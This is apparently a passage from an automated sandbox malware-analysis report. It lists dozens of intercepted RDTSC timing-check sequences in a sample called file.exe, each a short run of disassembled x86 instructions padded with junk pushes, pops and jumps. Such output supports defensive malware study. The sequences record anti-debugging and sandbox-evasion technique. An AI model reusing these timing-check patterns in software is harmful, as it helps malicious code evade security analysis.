0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F8078BD3396h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181FCDA second address: 181FCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F80798BCE56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181FCE7 second address: 181FCED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828401 second address: 1828427 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F80798BCE56h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c jmp 00007F80798BCE5Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jo 00007F80798BCE88h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1828427 second address: 182842D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18265F1 second address: 18265F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826891 second address: 18268A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD338Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18268A4 second address: 18268AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826BCA second address: 1826C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8078BD3399h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8078BD3391h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1826C05 second address: 1826C2A instructions: 0x00000000 rdtsc 0x00000002 js 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F80798BCE69h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182785D second address: 1827878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1827B2B second address: 1827B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F80798BCE5Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1827E27 second address: 1827E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8078BD3397h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1827E49 second address: 1827E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1827E4D second address: 1827E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1827E51 second address: 1827E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1829A3A second address: 1829A60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F8078BD338Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 178191D second address: 178192D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 178192D second address: 1781931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1781931 second address: 1781956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80798BCE5Ah 0x0000000f jmp 00007F80798BCE61h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1781956 second address: 178195A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18344C1 second address: 18344CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80798BCE56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833941 second address: 183394C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833A9C second address: 1833AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F80798BCE56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833AAB second address: 1833AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833AAF second address: 1833AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833C00 second address: 1833C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8078BD338Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1833C12 second address: 1833C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F80798BCE5Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1834042 second address: 1834079 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8078BD338Ch 0x00000008 jmp 00007F8078BD3399h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8078BD338Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A52E second address: 183A533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A93E second address: 183A942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183A942 second address: 183A948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183AABE second address: 183AAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3395h 0x00000007 jc 00007F8078BD3386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183AAE2 second address: 183AAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F80798BCE56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183AD8F second address: 183AD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B068 second address: 183B071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B1F0 second address: 183B1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B1F4 second address: 183B1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B1F8 second address: 183B1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B1FE second address: 183B20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183B20A second address: 183B20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1840FBD second address: 1840FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1840FC1 second address: 1840FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1840FC5 second address: 184100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F80798BCE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F80798BCE62h 0x00000015 jmp 00007F80798BCE5Fh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F80798BCE64h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184100D second address: 1841013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177E39D second address: 177E3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F80798BCE65h 0x0000000b jns 00007F80798BCE56h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 jl 00007F80798BCE56h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844C2E second address: 1844C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844C32 second address: 1844C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F80798BCE5Fh 0x0000000c jmp 00007F80798BCE67h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844DDC second address: 1844DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8078BD338Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F8078BD3386h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844DFB second address: 1844E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844E01 second address: 1844E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8078BD3386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1844E13 second address: 1844E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 184E99D second address: 184E9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jng 00007F8078BD3388h 0x0000000d push edx 0x0000000e pop edx 0x0000000f ja 00007F8078BD339Eh 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18552DA second address: 18552DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1784E69 second address: 1784E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1784E6F second address: 1784E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F80798BCE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857A86 second address: 1857A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857A8A second address: 1857A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F80798BCE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857A96 second address: 1857AA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857AA3 second address: 1857AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857AA9 second address: 1857AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857AAF second address: 1857AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857AB9 second address: 1857ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3392h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857C62 second address: 1857C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1857C79 second address: 1857C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD3390h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1869370 second address: 1869374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186F5D6 second address: 186F5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8078BD3388h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186F873 second address: 186F87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FE57 second address: 186FE63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FE63 second address: 186FE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FE69 second address: 186FE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FE6D second address: 186FE73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FFE9 second address: 186FFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8078BD3386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F8078BD3386h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 186FFFC second address: 1870000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1874395 second address: 187439C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 187439C second address: 18743A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18AB4B5 second address: 18AB4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0A0C second address: 18B0A32 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F80798BCE58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F80798BCE62h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0A32 second address: 18B0A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0A4D second address: 18B0A57 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F80798BCE62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0A57 second address: 18B0A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B0A5D second address: 18B0A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F80798BCE5Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B6D86 second address: 18B6D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B6BE6 second address: 18B6BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80798BCE5Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18B6BF6 second address: 18B6BFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E3D second address: 18C4E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E46 second address: 18C4E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E4A second address: 18C4E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Dh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E61 second address: 18C4E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E78 second address: 18C4E94 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80798BCE60h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4E94 second address: 18C4E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C4999 second address: 18C49DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE64h 0x00000007 jbe 00007F80798BCE58h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnl 00007F80798BCE6Fh 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18C49DE second address: 18C49E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19894AB second address: 19894B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19894B7 second address: 19894C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19894C4 second address: 1989509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F80798BCE67h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80798BCE5Ch 0x00000013 jmp 00007F80798BCE69h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988428 second address: 1988440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3394h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988440 second address: 198844E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F80798BCE5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988BC8 second address: 1988BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jl 00007F8078BD3386h 0x0000000f jmp 00007F8078BD338Eh 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988BE6 second address: 1988BED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988E8A second address: 1988E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jbe 00007F8078BD3392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1988E99 second address: 1988E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
